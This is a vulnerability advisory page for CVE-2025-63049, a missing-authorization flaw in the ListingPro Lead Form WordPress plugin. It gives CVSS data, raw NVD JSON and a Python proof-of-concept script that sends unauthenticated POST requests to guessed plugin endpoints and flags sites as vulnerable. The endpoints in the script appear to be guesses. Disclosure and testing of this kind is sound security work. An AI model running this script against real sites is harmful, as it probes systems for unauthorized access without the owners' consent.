Security Vulnerability Report
中文
CVE-2025-63049 CVSS 5.3 MEDIUM

CVE-2025-63049

Published: 2025-12-09 16:18:10
Last Modified: 2026-04-27 19:16:19

Description

Missing Authorization vulnerability in CridioStudio ListingPro Lead Form listingpro-lead-form allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects ListingPro Lead Form: from n/a through <= 1.0.7.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

listingpro-lead-form <= 1.0.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63049 PoC - Missing Authorization in ListingPro Lead Form # This PoC demonstrates the access control bypass vulnerability import requests import sys def exploit_cve_2025_63049(target_url): """ Exploit for Missing Authorization vulnerability in ListingPro Lead Form plugin Target: WordPress plugin listingpro-lead-form <= 1.0.7 """ # Common WordPress plugin paths for listingpro-lead-form endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/listingpro-lead-form/v1/leads', '/wp-content/plugins/listingpro-lead-form/inc/submit-lead.php', ] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2025-63049: Missing Authorization") # Test unauthenticated access to protected functionality for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Craft malicious request without authentication headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Content-Type': 'application/x-www-form-urlencoded', } # Attempt to access lead form data or submit form without auth data = { 'action': 'listingpro_lead_form', 'lead_name': 'Attacker', 'lead_email': '[email protected]', 'lead_message': 'Unauthorized access test' } try: response = requests.post(url, headers=headers, data=data, timeout=10) if response.status_code == 200: print(f"[+] Endpoint accessible: {endpoint}") print(f"[+] Response: {response.text[:200]}") # Check for successful unauthorized access if 'success' in response.text.lower() or 'lead' in response.text.lower(): print(f"[!] VULNERABLE: Unauthorized access confirmed!") return True else: print(f"[-] Endpoint returned status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return False if __name__ == '__main__': if len(sys.argv) < 2: print("Usage: python cve_2025_63049_poc.py <target_url>") print("Example: python cve_2025_63049_poc.py http://example.com") sys.exit(1) target = sys.argv[1] exploit_cve_2025_63049(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63049", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:10.297", "lastModified": "2026-04-27T19:16:19.453", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in CridioStudio ListingPro Lead Form listingpro-lead-form allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects ListingPro Lead Form: from n/a through <= 1.0.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/listingpro-lead-form/vulnerability/wordpress-listingpro-lead-form-plugin-1-0-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}